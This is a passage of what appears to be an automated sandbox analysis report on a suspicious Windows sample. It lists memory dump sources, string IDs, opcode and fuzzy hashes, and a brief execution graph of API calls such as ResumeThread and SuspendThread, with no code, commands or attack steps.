                                                                      • Instruction Fuzzy Hash: D9116D70808A8D8FDF85EF68C858AAA7FF0FF68301F05019AD818C71A1DB309954CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2323875372.00007FF8495D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495D0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff8495d0000_hyperbrokerhostNetsvc.jbxd
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2316931530.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_7ff848f10000_hyperbrokerhostNetsvc.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:4.6%
                                                                      Dynamic/Decrypted Code Coverage:75%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:12
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph
                                                                      56209 7ff8490c0d95 56210 7ff8490c0daf GetFileAttributesW 56209->56210 56212 7ff8490c0e75 56210->56212
                                                                      56217 7ff8490becbb 56218 7ff8490becc6 ResumeThread 56217->56218 56220 7ff8490bedc4 56218->56220
                                                                      56205 7ff8490bee19 56206 7ff8490bee27 FindCloseChangeNotification 56205->56206 56208 7ff8490bef04 56206->56208
                                                                      56213 7ff8490bd4cd 56214 7ff8490bd4db SuspendThread 56213->56214 56216 7ff8490bd5b4 56214->56216
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f2b000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: fM_H
                                                                      • API String ID: 0-40886633
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V3_^$W3_^
                                                                      • API String ID: 0-4200353899
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8zdI$XaeI
                                                                      • API String ID: 0-2109317414
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HJ@I$HJ@I
                                                                      • API String ID: 0-3218539128
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2$pL@I
                                                                      • API String ID: 0-569896136
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HJ@I$hn@I
                                                                      • API String ID: 0-547439482
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d
                                                                      • API String ID: 0-2564639436
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _^H
                                                                      • API String ID: 0-842449272
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _^H
                                                                      • API String ID: 0-842449272
                                                                      • Opcode ID: 044542eb1c8fc1e2f8cb7ccd1802cc999c2037f81250172529b66fb778b14a61
                                                                      • Instruction ID: 3c1062990378ec5edb659c94eb25f7fec0061380b42bff6d973b830919492326
                                                                      • Opcode Fuzzy Hash: 044542eb1c8fc1e2f8cb7ccd1802cc999c2037f81250172529b66fb778b14a61
                                                                      • Instruction Fuzzy Hash: 78028970A4895D8FDF99EF18C898BA9B7B5FB68701F1041E9D00DE7291CA35AE85CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 54241aeefa1d0a9f22b09c467b0cfee67aaef5dc12a7a354db11f94356a7c149
                                                                      • Instruction ID: e52cf828a9f8c3d41559dbed5fa93abe8ec55cc08865d21dfef4ed558cefca03
                                                                      • Opcode Fuzzy Hash: 54241aeefa1d0a9f22b09c467b0cfee67aaef5dc12a7a354db11f94356a7c149
                                                                      • Instruction Fuzzy Hash: BDD1BC3090DA968FEB7CEF28D495675B7E1FF45340B2449BEC48AC3682DA29F846C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M3_^
                                                                      • API String ID: 0-3756472669
                                                                      • Opcode ID: 73e56f56086c263879c88adb86ee1e41f3cbf60585e6f1039d858152f9f7eb55
                                                                      • Instruction ID: e4fbef7e08790931014690b4727fc442a63721a8e7affe5051f3a83e07d68d5b
                                                                      • Opcode Fuzzy Hash: 73e56f56086c263879c88adb86ee1e41f3cbf60585e6f1039d858152f9f7eb55
                                                                      • Instruction Fuzzy Hash: 2421B112D8D5E39EFF7D7A6925150FC2A90EF567A0F180276D64F860D3CC0CA88A5397
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: hW@I
                                                                      • API String ID: 0-1230802676
                                                                      • Opcode ID: f3728aa2032f0f58d09df0c4bcb8727621cff0c3712526963377a81b7e0b133f
                                                                      • Instruction ID: 09e9ba279657634de62b065fc7b6290d3ac134c63583e78002daab35318cdef9
                                                                      • Opcode Fuzzy Hash: f3728aa2032f0f58d09df0c4bcb8727621cff0c3712526963377a81b7e0b133f
                                                                      • Instruction Fuzzy Hash: 4071153590C9C98FEBB8FE1884565B837C4FF48351B1413B9D49EC79E2DE18E81A8781
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 5ae93b45c17b781dc353997937bef4c57eef2a682a69779d50673f991d6f73b3
                                                                      • Instruction ID: cffa3f4d4f3d20e74d2505dd3f7df56a8dba4e28cb1008dac4ac843a84d46471
                                                                      • Opcode Fuzzy Hash: 5ae93b45c17b781dc353997937bef4c57eef2a682a69779d50673f991d6f73b3
                                                                      • Instruction Fuzzy Hash: 47516C30D0D59E9FDB69EFA8D8516BDB7B1FF54740F2141BAC01AE7282CA386905CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (anI
                                                                      • API String ID: 0-4188620487
                                                                      • Opcode ID: d3cdb36e8d647d1f01f18c887a5fb5f36f6d32b9df6233de8ff016d17c8c0e0e
                                                                      • Instruction ID: f32bc2bb9dbb0c7d6ae4bfef66184d065dc81e0365d0f20ce693645a9c0aac99
                                                                      • Opcode Fuzzy Hash: d3cdb36e8d647d1f01f18c887a5fb5f36f6d32b9df6233de8ff016d17c8c0e0e
                                                                      • Instruction Fuzzy Hash: 9E01EC34E0D55BCFEBA1EF58C885ABDB7F0EF58352F144535D408D3698EA38A9848B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb0bd97a5049d357428f093086ac45a1d0b8f500b22d58b977ee9fef95bd9582
                                                                      • Instruction ID: 85f0414bb80c79b806d13ca1d0d424539f4646ee4f87de447f7e985854a53d0b
                                                                      • Opcode Fuzzy Hash: fb0bd97a5049d357428f093086ac45a1d0b8f500b22d58b977ee9fef95bd9582
                                                                      • Instruction Fuzzy Hash: 17822474A4891C8FCFA9EF18C894FA9B7B1FB68305F5041E9910EE7651DA31AE81CF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8fb1d990e3e293e8051d78309679c44e9d2bca427101ff5efd6f4713a49a7274
                                                                      • Instruction ID: e9569509adc71d7d7fcf4924fe2f17c0208cc0b835d0affa37a19816c5713250
                                                                      • Opcode Fuzzy Hash: 8fb1d990e3e293e8051d78309679c44e9d2bca427101ff5efd6f4713a49a7274
                                                                      • Instruction Fuzzy Hash: 3642227180D69A8FEB61FF28D8565FA3BB4FF14354F2542B6D05CCB192DA28A481CBC1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 97696b844cb7720ba657acbf2e0b8e2041b60d4ccb8eaadb66138174428a6018
                                                                      • Instruction ID: 188562628cfab9b109504a461f5dacb57ddb0cf4f2893682901892089c15e18e
                                                                      • Opcode Fuzzy Hash: 97696b844cb7720ba657acbf2e0b8e2041b60d4ccb8eaadb66138174428a6018
                                                                      • Instruction Fuzzy Hash: 64523674A4891D8FDF99EF18C898BA977B1FB68341F5041E9D00EE7661DA31AE81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47688d11cbfd34dae9b977f0b434f3d3b5c867fe45d2eb85ff501890f452b17e
                                                                      • Instruction ID: 219b978ee1bbfbece0319cf24fb60062df1ade4b64d500960302fae869101434
                                                                      • Opcode Fuzzy Hash: 47688d11cbfd34dae9b977f0b434f3d3b5c867fe45d2eb85ff501890f452b17e
                                                                      • Instruction Fuzzy Hash: FE126870A4895D8FDF98EF18C898BA977B1FB68341F5041E9D00EE72A1DA35AD85CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3eaf0f1ba51068ba9b85cee2bbbe47e69355432ecceb0fef58ffc92ed5609e51
                                                                      • Instruction ID: 6adddfb8f3de5a162bed55eb76ed8bdfc12415a7d5db0fb61051823284646029
                                                                      • Opcode Fuzzy Hash: 3eaf0f1ba51068ba9b85cee2bbbe47e69355432ecceb0fef58ffc92ed5609e51
                                                                      • Instruction Fuzzy Hash: 4A128934A4891D8FDFA9EF18C894FA977B1FB68341F5041A9D00EE7661DA35AE81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80c9efe24f83ff072f51dcadf71b71512d4e21d5260cd37049f8b0ece522890d
                                                                      • Instruction ID: c1f90274ed2f940d8e2bc8c5a647c293a3f1741f5eff2ed0bfc7aa032538a790
                                                                      • Opcode Fuzzy Hash: 80c9efe24f83ff072f51dcadf71b71512d4e21d5260cd37049f8b0ece522890d
                                                                      • Instruction Fuzzy Hash: B0F15C70909A8D8FEBB8EF28C855BE93BE1FF59341F10412AD84ED7291DB749984CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 93db0e0a04c18dbd9977ee94fc117b1e54a5d083db0ed23cd8043359de93f719
                                                                      • Instruction ID: 2df2ed58014f4c378925973a9a1560ef469a1fdb96d76f11feae4ccea9675cdc
                                                                      • Opcode Fuzzy Hash: 93db0e0a04c18dbd9977ee94fc117b1e54a5d083db0ed23cd8043359de93f719
                                                                      • Instruction Fuzzy Hash: F7F1A03091D6968FEB5CDF24C4E06B537A1FF44350F6545BDC85E8B68ACA38E882CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 611f1f313c17364173a7d22ec7df73809c03d56ecb7266aa75a0b2a99ff476b3
                                                                      • Instruction ID: 270fa20eb3e95e5e99bfa3d6c97ef70ef1bad02dfd89c3fd917efa7032c87c94
                                                                      • Opcode Fuzzy Hash: 611f1f313c17364173a7d22ec7df73809c03d56ecb7266aa75a0b2a99ff476b3
                                                                      • Instruction Fuzzy Hash: 9DD1F130A0DB868FE378FF28D89197577E1FF44380B25457ED59AC7A82DA29B8428741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c09dddf3357af36aea6d1e2c9ad0854b7cf94413ad531ddf2aa5a3c1463eefba
                                                                      • Instruction ID: 449b6c6a83b18575f2b2ca9725a7dc4d55a91feac9941c116d8aab29d79379d0
                                                                      • Opcode Fuzzy Hash: c09dddf3357af36aea6d1e2c9ad0854b7cf94413ad531ddf2aa5a3c1463eefba
                                                                      • Instruction Fuzzy Hash: 07F17534A4891D8FDFA9EF18C894BA977B5FB68301F5041E9D00EE7661DA31AE81CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dc810d8764e42eeeaf4d97e06c2e2f78d499e7bd59b90e8725e4df1d2da22d90
                                                                      • Instruction ID: db694aa3a4ee20e0d45462f84efa2e9b49291bd4943acc6b7d90db5fa5030ac0
                                                                      • Opcode Fuzzy Hash: dc810d8764e42eeeaf4d97e06c2e2f78d499e7bd59b90e8725e4df1d2da22d90
                                                                      • Instruction Fuzzy Hash: C561A97090995D9FDFA8EF18C899BA9B7B1FB68340F1501E9D00EE7291CE35A985CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 68c684316329e72d7aded4b04e168d9bbd7ea9cc2ce7cb6d4dcf8152890f1d9e
                                                                      • Instruction ID: 722dbb641fa091a69ae85b1e986a548aff404e206eb763eb9a1916e4b66c6a92
                                                                      • Opcode Fuzzy Hash: 68c684316329e72d7aded4b04e168d9bbd7ea9cc2ce7cb6d4dcf8152890f1d9e
                                                                      • Instruction Fuzzy Hash: 30518031D196599FDB44FBA8E4956FDBBB0FF48354F04067AD009DB292CF38A8818794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6165e8209b3da1aeeca7b6279ff60a8925861c7ed48ccd2842b852af213e07a
                                                                      • Instruction ID: 9d5d707601c809ee8881042e39ef6c583bc4b1ea194d8961295cf329d25f179a
                                                                      • Opcode Fuzzy Hash: d6165e8209b3da1aeeca7b6279ff60a8925861c7ed48ccd2842b852af213e07a
                                                                      • Instruction Fuzzy Hash: D951C430D1C5AA8FEBADAB1884657B9B7A1FF55340F1449BEC04EC71C2DE3CA9858B41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e70e02e4a7d1aaad803be3a4ab77dc98b574b86202fed0f9235269ad805a570
                                                                      • Instruction ID: b8ad835d026521918bc3f1c6e550a1cf236f03f430aa192ec9cf5548af148bdf
                                                                      • Opcode Fuzzy Hash: 4e70e02e4a7d1aaad803be3a4ab77dc98b574b86202fed0f9235269ad805a570
                                                                      • Instruction Fuzzy Hash: 6E41E630E1DA8E4FEBA8EF78A8546BA77E5FF54340F5141BAD01DC3286DE28E8058340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 60b492fdde599e7cfe63b9fdee591d410c610970af7eaa3fa15b542673f9a408
                                                                      • Instruction ID: aba19fee40e7bd5ed6d91e1b7e1b967a6f07b5242959c1bc67b64441e2bf844e
                                                                      • Opcode Fuzzy Hash: 60b492fdde599e7cfe63b9fdee591d410c610970af7eaa3fa15b542673f9a408
                                                                      • Instruction Fuzzy Hash: 4E514730A1DA4A4FD79CFF2888819B273E5FF99354B2642B9D41DC714BDA29F842C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abd85a135f426b54e9773d2ec0e89c2c402f45074de2cf28b0a745648a209ca3
                                                                      • Instruction ID: d9fb371228a737daa277c82d61532a6136123caecff9424c96b65bea6c986db7
                                                                      • Opcode Fuzzy Hash: abd85a135f426b54e9773d2ec0e89c2c402f45074de2cf28b0a745648a209ca3
